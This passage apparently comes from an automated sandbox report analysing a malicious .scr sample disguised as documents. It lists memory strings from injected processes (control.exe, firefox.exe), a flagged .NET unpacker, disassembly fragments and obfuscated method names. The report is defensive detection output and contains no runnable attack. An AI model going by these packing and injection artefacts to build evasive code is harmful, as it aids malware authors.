                Source: Binary string: Unexpected node type! Please add aupport for any new parse tree nodes to the AutoParseTreeVisitor class!VB$AnonymousDelegateVB$StateMachinemscorpe.dllCreateICeeFileGenCreateICeeFileGenDestroyICeeFileGenDestroyICeeFileGen%ld.Myalink.dllCreateALinkCreateALinkComImport_VtblGap As Integer.pdbCLSID_CorSymWriter&%s.sdatavector<T> too longS?~ source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: R:\JoeSecurity\trunk\src\windows\usermode\tools\FakeChrome\Release\Chrome.pdb source: uFLByAWAOFbhtV.exe, 00000005.00000000.1766652300.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000002.4132210801.0000000000BDE000.00000002.00000001.01000000.0000000C.sdmp
                Source: Binary string: control.pdb source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: vbc.exe, vbc.exe, 00000004.00000002.1847344994.00000000055A0000.00000040.00001000.00020000.00000000.sdmp, control.exe, control.exe, 00000006.00000003.1849604630.00000000049AD000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000003.1847230408.00000000047F3000.00000004.00000020.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004B60000.00000040.00001000.00020000.00000000.sdmp, control.exe, 00000006.00000002.4133421919.0000000004CFE000.00000040.00001000.00020000.00000000.sdmp
                Source: Binary string: vbc.pdb source: control.exe, 00000006.00000002.4134255300.000000000541C000.00000004.10000000.00040000.00000000.sdmp, control.exe, 00000006.00000002.4133923961.0000000004EB7000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 0000000A.00000000.1915538876.000000000344C000.00000004.00000001.00040000.00000000.sdmp, firefox.exe, 0000000B.00000002.2136958626.00000000089CC000.00000004.80000000.00040000.00000000.sdmp
                Source: Binary string: control.pdbUGP source: vbc.exe, 00000004.00000002.1846972436.0000000005148000.00000004.00000020.00020000.00000000.sdmp, uFLByAWAOFbhtV.exe, 00000005.00000002.4132695833.0000000000728000.00000004.00000020.00020000.00000000.sdmp

                Data Obfuscation

                barindex
                .NET source code contains potential unpacker
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.cs.Net Code: FYToGybVc5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.cs.Net Code: FYToGybVc5 System.Reflection.Assembly.Load(byte[])
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.cs.Net Code: FYToGybVc5 System.Reflection.Assembly.Load(byte[])
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01A760A8 push dword ptr [ecx+ecx-75h]; iretd 0_2_01A760BA
                Source: C:\Users\user\Desktop\PASU5160894680 DOCS.scr.exeCode function: 0_2_01AB2CBA push eax; iretd 0_2_01AB2CC1
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004186EC push si; ret 4_2_00418702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041804C push 700438E3h; retf 4_2_00418060
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041786E push ebx; iretd 4_2_004178DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004030F0 push eax; ret 4_2_004030F2
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041788A push ebx; iretd 4_2_004178DC
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_0041A265 pushfd ; retf 4_2_0041A26C
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004132CA push edx; retf 4_2_004132CE
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_004186F4 push esi; ret 4_2_00418702
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A27FA pushad ; ret 4_2_055A27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A225F pushad ; ret 4_2_055A27F9
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055D09AD push ecx; mov dword ptr [esp], ecx4_2_055D09B6
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A283D push eax; iretd 4_2_055A2858
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exeCode function: 4_2_055A1338 push eax; iretd 4_2_055A1369
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C0BF2C push es; retf 5_2_03C0BF2D
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C026A4 push edx; retf 5_2_03C026A8
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C0963F pushfd ; retf 5_2_03C09646
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C0459E push edx; iretd 5_2_03C045A0
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C06C48 push ebx; iretd 5_2_03C06CB6
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C06C64 push ebx; iretd 5_2_03C06CB6
                Source: C:\Program Files (x86)\sdecqEMxTDtEFALjHIqaewCANHWGRfolJPZgFbObylprhnoDfadzMCbpiOJuDvbSkRYTs\uFLByAWAOFbhtV.exeCode function: 5_2_03C07426 push 700438E3h; retf 5_2_03C0743A
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_04B909AD push ecx; mov dword ptr [esp], ecx6_2_04B909B6
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C620D1 push edx; iretd 6_2_00C620D3
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C70041 push esp; iretd 6_2_00C70042
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C601D7 push edx; retf 6_2_00C601DB
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C67172 pushfd ; retf 6_2_00C67179
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C655F9 push si; ret 6_2_00C6560F
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C65601 push esi; ret 6_2_00C6560F
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C64797 push ebx; iretd 6_2_00C647E9
                Source: C:\Windows\SysWOW64\control.exeCode function: 6_2_00C6477B push ebx; iretd 6_2_00C647E9
                Source: PASU5160894680 DOCS.scr.exeStatic PE information: section name: .text entropy: 7.961122101465982
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, W9j0hNrclYvl2EJnE9.csHigh entropy of concatenated method names: 'yNWQXpn2HA', 'rYcQkd2MHP', 'WZDQRNElat', 'RX4QMg4Iec', 'iKJQEBJo7Z', 'l8pRSyE3Xm', 'SUHROQB3bn', 'q8gRLogBQ8', 'ArfRDFCQ5s', 'lEYRCavPMm'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, SYHGI3689qTBw0EhYk.csHigh entropy of concatenated method names: 'xdDMULrtJp', 'YsvMxLc2hn', 'zJcMQJhynI', 'cYjQ1kXWjM', 'jH8Qz2dgaC', 'HpmMjT5IDI', 'wmtMqkPaB7', 'mSTM75JnmB', 'IimMBDnpLg', 'IN4MoAVdm0'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, A4XqRQkhHlmMIqCpGN.csHigh entropy of concatenated method names: 'Dispose', 'TkjqClJ9fs', 'Y8t721yEXm', 'lhOOOH8CPj', 'xEHq1daUMJ', 'tI8qzx7IGJ', 'ProcessDialogKey', 'o8K7jn9Iv4', 'aca7qfXK1h', 'pjl77IIvMC'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, VtvmtCHuFwanI5JuSv.csHigh entropy of concatenated method names: 'X0hxm1JKlb', 'uiaxWZ9ogQ', 'xiaxJnKWmP', 'oDqxHxmnIw', 'frFxIvRaUW', 'IA4xTOXCkw', 'zHsxffOub3', 'agxxa4kREp', 'mxoxP59bGj', 'vGtxYRlX1l'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, n5o3CtEHtQcW8gVMs0.csHigh entropy of concatenated method names: 'vSABXPmQCb', 'VbSBUrnyhM', 'tZdBkuZeEH', 'XGGBxMM45q', 'uBUBReMEIv', 'rDZBQYkDia', 'CRcBMdsmCM', 'MJtBEBguXE', 'JcLBKsOoQ7', 'LG2B8QbPWY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, SZCI26qjQxOuNujNBtL.csHigh entropy of concatenated method names: 'CE9PN9hs5i', 'O9ePZAHSZr', 'u0GPGKBUwq', 'KttPmsDsSD', 'kZePFgGp1k', 'IX4PW9Qbrq', 'NtsP4YuOy4', 'FXTPJ5rBkJ', 'o27PHwFJks', 'hDpPgNvC1V'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, qLenhw5Sm7Lh6igBYm.csHigh entropy of concatenated method names: 'y2T3JSI97E', 'wbQ3HxG7r1', 'M7u3r6NrpR', 'lrb32nYpJg', 'nAp3vOUwUl', 'Mb43y8QY3q', 'pKY36OEsbw', 'elf3bqoJnP', 'EpG3uUbKxA', 'Q3L3leLol4'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, k1AUgJoTmD0W47iTUw.csHigh entropy of concatenated method names: 'RWyqMOPHjj', 'r1DqEReOpD', 'YuFq8wanI5', 'DuSqtvmh58', 'aUWqIZkL9j', 'ThNqTclYvl', 'LNyXUioRW6sWETFDkF', 'ywsYPoZbPWiUfQGxTD', 'EPLqqs4gBY', 'QE5qBwo612'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, bYKcFY7cuY0EWdIDkW.csHigh entropy of concatenated method names: 'GX0GXhYvC', 'nFHmGBROm', 'vfPWJC05N', 'vpR4FYHrf', 'uM0HC7Gny', 'vTPgaTy2T', 'jgbQ8msyxsjnLsRGGu', 'gCITGxwbXTBjgFuLUy', 'B4na3JfpR', 'I63YbYs2K'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, JOPHjjJP1DReOpDY0L.csHigh entropy of concatenated method names: 'i1skc05PDr', 'KK5keWQRlY', 'H1VkhJwtin', 'SoBk0cmIML', 'EEBkS9bqfA', 'rBbkOY4bb4', 'mtokLqk2ZP', 'J8NkDON2oy', 'xvfkC3qT2B', 'xddk1CC4as'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, AAWUNAzsprCkGEZgdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'K33P3LWSaY', 'jo4PIxVWVl', 'BPAPTaeoxH', 'sEuPf0fx3L', 'YckPaZGT7V', 'MaDPPS4wZd', 'YjYPYTyIw8'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, oIvMCA10UN5HX1BU7M.csHigh entropy of concatenated method names: 'rcfPqAPZH6', 'ogiPB9W7aQ', 'yYyPocv8Wx', 'CkmPUyy0dq', 'tHaPkLKHM7', 'N7RPRq6jKB', 'vXsPQu1dr3', 'clWaLn1NQc', 'lboaDpHUHU', 'TZcaC5TMH9'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, NryRmlOIi6e1KpF7D5.csHigh entropy of concatenated method names: 'gVvfDN4BbY', 'MSwf1BRXVh', 'CtdajJmiTX', 'i2KaqgCR3u', 'nktflmJhO1', 'yy6fd6p0Eb', 'hZRf5u1loO', 'WsefcM2p1x', 'hqBfeioe0J', 'KmQfh2j1yj'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, kHdaUMDJYI8x7IGJI8.csHigh entropy of concatenated method names: 'IVEaUPTxEK', 'Gsvakfk3TI', 'cD8ax3yebM', 'oA7aR37YLE', 'YxyaQW5qa2', 'eGUaMSOGC8', 'z6kaEMfrT2', 'HAhaKZ3hKr', 'AIda8aAwFQ', 'Gw1atGbASY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, ln9Iv4CjcafXK1hTjl.csHigh entropy of concatenated method names: 'SJ7arIJkvy', 'h22a2m0x6A', 'uKZaACSX7o', 'WOQavC9qlh', 'zUTacwabwE', 'MCFaykQAqS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, Cv0gD6cuYxRYG4BACB.csHigh entropy of concatenated method names: 'u9jIuLs4S6', 'skDIdA4lUW', 'wYpIcYUqwB', 'sttIe3A5vX', 'vWCI2i28K9', 'G6bIApJmF7', 'MSjIvAom40', 'TNxIy79aIH', 'LMeIpQ7vbA', 'tktI6h2TDM'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, DJgbrHqBZJQYLJgo1mB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giJYcNVkSg', 'ijFYeNKJG9', 'AkuYhwY5LH', 'LPpY0cP1LN', 'Y6BYSDBuqe', 'WdlYO0Y6mi', 'dmPYLF2pd3'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, Ah58cHg4t3yBSjUWZk.csHigh entropy of concatenated method names: 'O5nRF41oUs', 'BeNR4nYnk3', 'XLfxAgafyG', 'iU6xvhruBV', 'iO6xyIu6X6', 'oH6xp9PDZi', 'OE3x6497Bn', 'FFTxbecv8j', 'tKNx9MMtog', 'HZIxubkjib'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.46845e0.2.raw.unpack, khrQWT9aJS2Tbn07Yp.csHigh entropy of concatenated method names: 'Hc4MNWXhMt', 'F7pMZrMjdI', 'hmGMGaubUA', 'ASkMmFUuXH', 'dKxMFIuUq0', 'foXMWXGdsQ', 'xl9M4ocgS3', 'f0oMJ7Ehxx', 'UG6MHxTKX4', 'QWqMgpdwQM'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, W9j0hNrclYvl2EJnE9.csHigh entropy of concatenated method names: 'yNWQXpn2HA', 'rYcQkd2MHP', 'WZDQRNElat', 'RX4QMg4Iec', 'iKJQEBJo7Z', 'l8pRSyE3Xm', 'SUHROQB3bn', 'q8gRLogBQ8', 'ArfRDFCQ5s', 'lEYRCavPMm'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, SYHGI3689qTBw0EhYk.csHigh entropy of concatenated method names: 'xdDMULrtJp', 'YsvMxLc2hn', 'zJcMQJhynI', 'cYjQ1kXWjM', 'jH8Qz2dgaC', 'HpmMjT5IDI', 'wmtMqkPaB7', 'mSTM75JnmB', 'IimMBDnpLg', 'IN4MoAVdm0'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, A4XqRQkhHlmMIqCpGN.csHigh entropy of concatenated method names: 'Dispose', 'TkjqClJ9fs', 'Y8t721yEXm', 'lhOOOH8CPj', 'xEHq1daUMJ', 'tI8qzx7IGJ', 'ProcessDialogKey', 'o8K7jn9Iv4', 'aca7qfXK1h', 'pjl77IIvMC'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, VtvmtCHuFwanI5JuSv.csHigh entropy of concatenated method names: 'X0hxm1JKlb', 'uiaxWZ9ogQ', 'xiaxJnKWmP', 'oDqxHxmnIw', 'frFxIvRaUW', 'IA4xTOXCkw', 'zHsxffOub3', 'agxxa4kREp', 'mxoxP59bGj', 'vGtxYRlX1l'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, n5o3CtEHtQcW8gVMs0.csHigh entropy of concatenated method names: 'vSABXPmQCb', 'VbSBUrnyhM', 'tZdBkuZeEH', 'XGGBxMM45q', 'uBUBReMEIv', 'rDZBQYkDia', 'CRcBMdsmCM', 'MJtBEBguXE', 'JcLBKsOoQ7', 'LG2B8QbPWY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, SZCI26qjQxOuNujNBtL.csHigh entropy of concatenated method names: 'CE9PN9hs5i', 'O9ePZAHSZr', 'u0GPGKBUwq', 'KttPmsDsSD', 'kZePFgGp1k', 'IX4PW9Qbrq', 'NtsP4YuOy4', 'FXTPJ5rBkJ', 'o27PHwFJks', 'hDpPgNvC1V'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, qLenhw5Sm7Lh6igBYm.csHigh entropy of concatenated method names: 'y2T3JSI97E', 'wbQ3HxG7r1', 'M7u3r6NrpR', 'lrb32nYpJg', 'nAp3vOUwUl', 'Mb43y8QY3q', 'pKY36OEsbw', 'elf3bqoJnP', 'EpG3uUbKxA', 'Q3L3leLol4'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, k1AUgJoTmD0W47iTUw.csHigh entropy of concatenated method names: 'RWyqMOPHjj', 'r1DqEReOpD', 'YuFq8wanI5', 'DuSqtvmh58', 'aUWqIZkL9j', 'ThNqTclYvl', 'LNyXUioRW6sWETFDkF', 'ywsYPoZbPWiUfQGxTD', 'EPLqqs4gBY', 'QE5qBwo612'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, bYKcFY7cuY0EWdIDkW.csHigh entropy of concatenated method names: 'GX0GXhYvC', 'nFHmGBROm', 'vfPWJC05N', 'vpR4FYHrf', 'uM0HC7Gny', 'vTPgaTy2T', 'jgbQ8msyxsjnLsRGGu', 'gCITGxwbXTBjgFuLUy', 'B4na3JfpR', 'I63YbYs2K'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, JOPHjjJP1DReOpDY0L.csHigh entropy of concatenated method names: 'i1skc05PDr', 'KK5keWQRlY', 'H1VkhJwtin', 'SoBk0cmIML', 'EEBkS9bqfA', 'rBbkOY4bb4', 'mtokLqk2ZP', 'J8NkDON2oy', 'xvfkC3qT2B', 'xddk1CC4as'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, AAWUNAzsprCkGEZgdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'K33P3LWSaY', 'jo4PIxVWVl', 'BPAPTaeoxH', 'sEuPf0fx3L', 'YckPaZGT7V', 'MaDPPS4wZd', 'YjYPYTyIw8'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, oIvMCA10UN5HX1BU7M.csHigh entropy of concatenated method names: 'rcfPqAPZH6', 'ogiPB9W7aQ', 'yYyPocv8Wx', 'CkmPUyy0dq', 'tHaPkLKHM7', 'N7RPRq6jKB', 'vXsPQu1dr3', 'clWaLn1NQc', 'lboaDpHUHU', 'TZcaC5TMH9'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, NryRmlOIi6e1KpF7D5.csHigh entropy of concatenated method names: 'gVvfDN4BbY', 'MSwf1BRXVh', 'CtdajJmiTX', 'i2KaqgCR3u', 'nktflmJhO1', 'yy6fd6p0Eb', 'hZRf5u1loO', 'WsefcM2p1x', 'hqBfeioe0J', 'KmQfh2j1yj'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, kHdaUMDJYI8x7IGJI8.csHigh entropy of concatenated method names: 'IVEaUPTxEK', 'Gsvakfk3TI', 'cD8ax3yebM', 'oA7aR37YLE', 'YxyaQW5qa2', 'eGUaMSOGC8', 'z6kaEMfrT2', 'HAhaKZ3hKr', 'AIda8aAwFQ', 'Gw1atGbASY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, ln9Iv4CjcafXK1hTjl.csHigh entropy of concatenated method names: 'SJ7arIJkvy', 'h22a2m0x6A', 'uKZaACSX7o', 'WOQavC9qlh', 'zUTacwabwE', 'MCFaykQAqS', 'Next', 'Next', 'Next', 'NextBytes'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, Cv0gD6cuYxRYG4BACB.csHigh entropy of concatenated method names: 'u9jIuLs4S6', 'skDIdA4lUW', 'wYpIcYUqwB', 'sttIe3A5vX', 'vWCI2i28K9', 'G6bIApJmF7', 'MSjIvAom40', 'TNxIy79aIH', 'LMeIpQ7vbA', 'tktI6h2TDM'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, DJgbrHqBZJQYLJgo1mB.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'giJYcNVkSg', 'ijFYeNKJG9', 'AkuYhwY5LH', 'LPpY0cP1LN', 'Y6BYSDBuqe', 'WdlYO0Y6mi', 'dmPYLF2pd3'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, Ah58cHg4t3yBSjUWZk.csHigh entropy of concatenated method names: 'O5nRF41oUs', 'BeNR4nYnk3', 'XLfxAgafyG', 'iU6xvhruBV', 'iO6xyIu6X6', 'oH6xp9PDZi', 'OE3x6497Bn', 'FFTxbecv8j', 'tKNx9MMtog', 'HZIxubkjib'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.45fcfc0.1.raw.unpack, khrQWT9aJS2Tbn07Yp.csHigh entropy of concatenated method names: 'Hc4MNWXhMt', 'F7pMZrMjdI', 'hmGMGaubUA', 'ASkMmFUuXH', 'dKxMFIuUq0', 'foXMWXGdsQ', 'xl9M4ocgS3', 'f0oMJ7Ehxx', 'UG6MHxTKX4', 'QWqMgpdwQM'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, W9j0hNrclYvl2EJnE9.csHigh entropy of concatenated method names: 'yNWQXpn2HA', 'rYcQkd2MHP', 'WZDQRNElat', 'RX4QMg4Iec', 'iKJQEBJo7Z', 'l8pRSyE3Xm', 'SUHROQB3bn', 'q8gRLogBQ8', 'ArfRDFCQ5s', 'lEYRCavPMm'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, SYHGI3689qTBw0EhYk.csHigh entropy of concatenated method names: 'xdDMULrtJp', 'YsvMxLc2hn', 'zJcMQJhynI', 'cYjQ1kXWjM', 'jH8Qz2dgaC', 'HpmMjT5IDI', 'wmtMqkPaB7', 'mSTM75JnmB', 'IimMBDnpLg', 'IN4MoAVdm0'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, A4XqRQkhHlmMIqCpGN.csHigh entropy of concatenated method names: 'Dispose', 'TkjqClJ9fs', 'Y8t721yEXm', 'lhOOOH8CPj', 'xEHq1daUMJ', 'tI8qzx7IGJ', 'ProcessDialogKey', 'o8K7jn9Iv4', 'aca7qfXK1h', 'pjl77IIvMC'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, VtvmtCHuFwanI5JuSv.csHigh entropy of concatenated method names: 'X0hxm1JKlb', 'uiaxWZ9ogQ', 'xiaxJnKWmP', 'oDqxHxmnIw', 'frFxIvRaUW', 'IA4xTOXCkw', 'zHsxffOub3', 'agxxa4kREp', 'mxoxP59bGj', 'vGtxYRlX1l'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, n5o3CtEHtQcW8gVMs0.csHigh entropy of concatenated method names: 'vSABXPmQCb', 'VbSBUrnyhM', 'tZdBkuZeEH', 'XGGBxMM45q', 'uBUBReMEIv', 'rDZBQYkDia', 'CRcBMdsmCM', 'MJtBEBguXE', 'JcLBKsOoQ7', 'LG2B8QbPWY'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, SZCI26qjQxOuNujNBtL.csHigh entropy of concatenated method names: 'CE9PN9hs5i', 'O9ePZAHSZr', 'u0GPGKBUwq', 'KttPmsDsSD', 'kZePFgGp1k', 'IX4PW9Qbrq', 'NtsP4YuOy4', 'FXTPJ5rBkJ', 'o27PHwFJks', 'hDpPgNvC1V'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, qLenhw5Sm7Lh6igBYm.csHigh entropy of concatenated method names: 'y2T3JSI97E', 'wbQ3HxG7r1', 'M7u3r6NrpR', 'lrb32nYpJg', 'nAp3vOUwUl', 'Mb43y8QY3q', 'pKY36OEsbw', 'elf3bqoJnP', 'EpG3uUbKxA', 'Q3L3leLol4'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, k1AUgJoTmD0W47iTUw.csHigh entropy of concatenated method names: 'RWyqMOPHjj', 'r1DqEReOpD', 'YuFq8wanI5', 'DuSqtvmh58', 'aUWqIZkL9j', 'ThNqTclYvl', 'LNyXUioRW6sWETFDkF', 'ywsYPoZbPWiUfQGxTD', 'EPLqqs4gBY', 'QE5qBwo612'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, bYKcFY7cuY0EWdIDkW.csHigh entropy of concatenated method names: 'GX0GXhYvC', 'nFHmGBROm', 'vfPWJC05N', 'vpR4FYHrf', 'uM0HC7Gny', 'vTPgaTy2T', 'jgbQ8msyxsjnLsRGGu', 'gCITGxwbXTBjgFuLUy', 'B4na3JfpR', 'I63YbYs2K'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, JOPHjjJP1DReOpDY0L.csHigh entropy of concatenated method names: 'i1skc05PDr', 'KK5keWQRlY', 'H1VkhJwtin', 'SoBk0cmIML', 'EEBkS9bqfA', 'rBbkOY4bb4', 'mtokLqk2ZP', 'J8NkDON2oy', 'xvfkC3qT2B', 'xddk1CC4as'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, AAWUNAzsprCkGEZgdJ.csHigh entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'K33P3LWSaY', 'jo4PIxVWVl', 'BPAPTaeoxH', 'sEuPf0fx3L', 'YckPaZGT7V', 'MaDPPS4wZd', 'YjYPYTyIw8'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, oIvMCA10UN5HX1BU7M.csHigh entropy of concatenated method names: 'rcfPqAPZH6', 'ogiPB9W7aQ', 'yYyPocv8Wx', 'CkmPUyy0dq', 'tHaPkLKHM7', 'N7RPRq6jKB', 'vXsPQu1dr3', 'clWaLn1NQc', 'lboaDpHUHU', 'TZcaC5TMH9'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, NryRmlOIi6e1KpF7D5.csHigh entropy of concatenated method names: 'gVvfDN4BbY', 'MSwf1BRXVh', 'CtdajJmiTX', 'i2KaqgCR3u', 'nktflmJhO1', 'yy6fd6p0Eb', 'hZRf5u1loO', 'WsefcM2p1x', 'hqBfeioe0J', 'KmQfh2j1yj'
                Source: 0.2.PASU5160894680 DOCS.scr.exe.7cd0000.4.raw.unpack, kHdaUMDJYI8x7IGJI8.csHigh entropy of concatenated method names: 'IVEaUPTxEK', 'Gsvakfk3TI', 'cD8ax3yebM', 'oA7aR37YLE', 'YxyaQW5qa2', 'eGUaMSOGC8', 'z6kaEMfrT2', 'HAhaKZ3hKr', 'AIda8aAwFQ', 'Gw1atGbASY'
